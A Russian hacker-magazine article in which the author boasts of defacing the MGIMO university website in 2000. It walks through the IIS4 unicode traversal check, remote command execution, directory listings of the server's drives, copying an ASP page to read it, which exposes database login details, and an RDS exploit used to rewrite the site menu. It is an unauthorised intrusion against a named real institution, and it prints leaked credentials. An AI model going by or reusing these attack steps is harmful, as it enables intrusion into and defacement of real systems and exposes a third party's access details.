Внимание! Автор статьи не несет никакой
ответственности за правовые последствия
взлома. Статья написана исключительно для
демонстрации проникновения
администраторам системы, по всем вопросам
обращайтесь в редакцию Хакера

Привет ПерцЫ!

Сегодня я вам расскажу как мы c соратником
DZIL62 не попив пива всего за час сделали deface
на www.mgimo.ru.
Началось все с баннера сайта "РОССИЯ
МОЛОДАЯ". Прыгнув с баннера на www.mgimo.ru
и набрав http://www.mgimo.ru/dfgdfg/
тихо порадовались от следующей RULEZZZ надписи:

HTTP Error 404
404 Not Found
etc…
ось NT4.0 сервак IIS4.0

Далее ,запустив unicodecheck.pl, обнаружили что
дыра не пофиксена и после этого повесились
iis-zank`ом на www.mgimo.ru:80. Далее было интересно:

C> dir c:\
HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Thu, 28 Dec 2000 08:22:24 GMT
Content-Type: application/octet-stream
Volume in drive C is NOSPART
Volume Serial Number is 3914-1581

 Directory of c:\

11.05.00  13:03         <DIR>         
DOS
11.05.00  13:03         <DIR>         
I386
11.05.00  13:03         <DIR>         
HP
22.02.99  14:40                    
47 AUTOEXEC.BAT
23.02.99  16:55                    
87 CONFIG.SYS
11.05.00  13:19         <DIR>         
WINNT
11.05.00  13:15         <DIR>         
BATCH
11.05.00  13:21         <DIR>         
Program Files
11.05.00  13:23         <DIR>         
TEMP
11.05.00  13:23         <DIR>         
InetPub
11.05.00  14:00         <DIR>         
MSSQL7
11.05.00  14:12         <DIR>         
Microsoft Site Server
11.05.00  14:17         <DIR>         
exchsrvr
18.05.00  09:59         <DIR>         
DNews
11.05.00  13:21                   
294 BOOT.PCP
28.12.00  11:17                   
658 STATS.LOG
10.08.00  12:21                     
0 QUERY.LOG
28.08.00  15:02               
262═144 28_08_2000.evt
28.08.00  15:02               
524═288 28_08_2000_Application.evt
11.10.00  08:54                
65═536 sys.mdb
09.12.00  10:57               
524═288 09_12_2000.evt
13.12.00  15:53                     
0 akdm.htm
15.12.00  10:18               
524═288 15_12.evt
16.12.00  20:02                    
94 ftp.scr
22.12.00  15:00               
524═288 22_12.evt
             
25 File(s)      2═426═012 bytes
                           
403═767═296 bytes free

ХМММ…  А дальше?

C> dir d:\
HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Thu, 28 Dec 2000 07:41:31 GMT
Content-Type: application/octet-stream
Volume in drive D has no label.
Volume Serial Number is D8CB-3E50

 Directory of d:\

09.12.00  10:59         <DIR>         
INetPub
11.05.00  13:00         <DIR>         
MSSQL7
13.12.00  15:52         <DIR>         
New Folder
09.12.00  12:20           
536═870═912 pagefile.sys
07.06.00  12:54         <DIR>         
php3
11.05.00  13:05         <DIR>         
Program Files
19.05.00  14:22                
36═064 RAWRITE.EXE
19.05.00  14:20               
950═272 sym538xx.s
12.10.00  10:03                
65═536 sys.mdb
23.10.00  13:02         <DIR>         
temp
14.08.00  09:02         <DIR>         
Temporary Internet Files
             
11 File(s)    537═922═784 bytes
                        
88═212═832═256 bytes free

В реале оказалось ,что рабочий InetPub на
диске D:\. Почесав репу делаем следующее:

C> copy d:\inetpub\wwwroot\index.asp d:\inetpub\wwwroot\1.txt
HTTP/1.1 502 Gateway Error
Server: Microsoft-IIS/4.0
Date: Thu, 28 Dec 2000 08:30:25 GMT
Content-Length: 242
Content-Type: text/html

<head><title>Error in CGI Application</title></head>
<body><h1>CGI Error</h1>The specified CGI application
misbehaved by not returning a complete set of HTTP headers.  The headers it
did return are:<p><p><pre>       
1 file(s) copied.
</pre>

а затем прыгаем на www.mgimo.ru/1.txt. Контент того
,что меня интересовало в данной asp`шке:

adr=Request.ServerVariables("REMOTE_ADDR")
Set conn =Server.CreateObject("ADODB.Connection")
call conn.Open  ("sqlweb","inet","") —
алиас/логин/пароля нет(да и если бы был он
был бы здесь).
sqlstr="select [REMARK]  from [LENTA] where KOD=’"&kod&"’"
— ОППА таблица и база для контента страницы.

Ошибка админов в том, что юзер который
отвечает за контент страницы имеет права на
запись… Запустив RDSexploit, и набрав имя юзверя,
SQL_alias и базу с табличкой получили полный
контент таблицы, т.е. все содержание сайта.

Ну а далее правим главную менюшку:

<a href="index.asp" class=Menu>События Security Hole
checked by -=Sky12DooR=- best regards for DZIL62 —// etc…

Записываем изменения)))
— — — ВСЕ — — —
Cнимаем
скриншот.

Админам я уже отписал чтобы фиксили,
просьба не дергаться ,если не хотите
засветиться))

Оставить мнение

Check Also

Скрытая сила пробела. Эксплуатируем критическую уязвимость в Apache Tomcat

В этой статье мы поговорим о баге в Apache Tomcat, популярнейшем веб-сервере для сайтов на…